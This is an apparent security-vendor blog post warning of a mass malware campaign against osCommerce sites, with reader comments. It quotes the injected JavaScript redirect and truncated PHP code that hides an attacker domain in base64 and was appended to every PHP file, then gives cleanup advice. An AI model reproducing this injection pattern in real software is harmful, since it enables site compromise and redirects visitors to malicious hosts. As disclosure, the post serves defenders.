Skip links

Continuing attacks against osCommerce:

Busy week for osCommerce in terms of malware. First, the div_colors string, then, the CreateCSS string, and now, we are seeing thousands of osCommerce sites infected with a malware pointing to This is how it looks like in an infected site:

<script type="text/javascript">document.location = "…..tL2FkbWluLw=="

This javascript is generated by the following code added to the bottom of all PHP files in the server:

<?php if(!isset($tf[‘engine’])){$tf[‘engine’]=1;$tf[‘s’]=base64_decode(‘a2hjb2wuY29t’);$tf[‘u’]=’http://’.$tf[‘s’]…

We recommend that every osCommerce user check their sites and to take the proper steps to secure them (especially if using v2.2). The file_manager.php file needs to be removed, and the admin directory renamed and protected. We also recommend our malware scanner to verify if a site is infected. If it is, we can take care of it for you.

Update 1: Google already blacklisted more than 1 thousand sites because of this malware. We have identified a lot more already, so this number should grow very soon.

Update 2: Other domains being used in this attack:,,, and many others.

We will post more details as we track this malware.

  • mac

    it’s redirecting to khcol com it’s hit my website too, because my hosting company removed all permissions off the folders of my wordpress installing.

    does anyone know if just removing that bit of code fixes the issue?

  • mac

    Sorry double post

  • I shifted from osCommerce to opencart a long time ago. I got sick of all the attacks. Opencart really is easier and more beautiful to use, programmed with an OOP MVC approach, DIV and CSS layout from the start.. and it’s free too.